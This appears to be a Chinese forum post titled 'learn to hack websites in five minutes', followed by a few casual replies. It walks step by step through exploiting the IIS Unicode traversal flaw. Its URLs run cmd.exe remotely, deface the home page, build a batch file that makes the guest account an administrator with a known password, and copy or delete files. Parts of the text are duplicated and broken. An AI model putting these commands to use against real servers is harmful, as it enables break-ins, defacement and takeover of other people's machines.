5分钟学会黑网站　 如果对放有unicodi漏洞的话：　 先把c:\\winnt\\system32\\cmd.exe　拷贝到了c:\\inetpub\\scripts\\ccc.exe拷贝，cmd.exe(必须改名)方法：　http://ip/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\\system32\\cmd.exe+ccc.exe　 这时c:\\winnt\\system32\\cmd.exe已经拷贝到了c:\\inetpub\\scripts\\ccc.exe　 通过http://ip/scripts/ccc.exe?/c+dir+c:\　可以看到c:\\文件。　 我们就可以调用到cmd.exe了，就是说不用那个编码了。

　+c:\\inetpub\\wwwroot\\default.asp" target=_blank>http://192.168.8.48/scripts/ccc.exe?/c+echo+1/5/2001+>;>+c:\\inetpub\\wwwroot\\default.asp　 主页面就被修改成了：　 Hack　by　Chinese　 1/5/2001　 也就是说，已经把他的主页黑了。　 当然，我们也不能只停留在黑主页的地步，当然想进一步控制整个机器了。　 方法：　 编写.bat执行文件：　 1.打开IE，输入：http://ip/scripts/cmd.exe?/c　dir　怎么样？有cmd.exe文件了吧？这我们就完成了第一步；　 2.http://ip/scripts/cmd.exe?/c　echo　net　user　guest　/active:yes>go.bat　 3.http://ip/scripts/cmd.exe?/c　echo　net　user　guest　Chinese>>go.bat　 4.http://ip/scripts/cmd.exe?/c　echo　net　localgroup　administrators　/add　guest>>go.bat　 5.http://ip/scripts/cmd.exe?/c　type　go.bat　看看我们的批文件内容是否如下：　 net　user　guest　/active:yes　 net　user　guest　Chinese　 net　localgroup　administrators　/add　guest　 然后在：　

在磁盘当前位置执行.　 他的guest密码就是“Chinese”　而且是超级用户。　 然后你就可以:　net　use　\\\\ip\\ipc$　"Chinese"　/user:"guest"　 其余的net命令在这我就不都说了！　 当然你也可以:　 执行：;发现列出了远程主机C:\\下的所有文件　 执行：　http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c　+copy%20c:\\autoexec.bat+c:\\autoexec.bak　成功实现文件的复制，　 执行：http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del%20c:\autoexec.bak　成功实现文件的删除他的guest密码就是“Chinese”　而且是超级用户。　 然后你就可以:　net　 其余的net命令在这我就不都说了！

你准备黑哪个网站？

别犯法啦，小伙子。

嘿嘿，我还没用过哦！似乎、好像也不会啊

最近挺忙，准备六级，明天考试，希望自己可以一举得胜。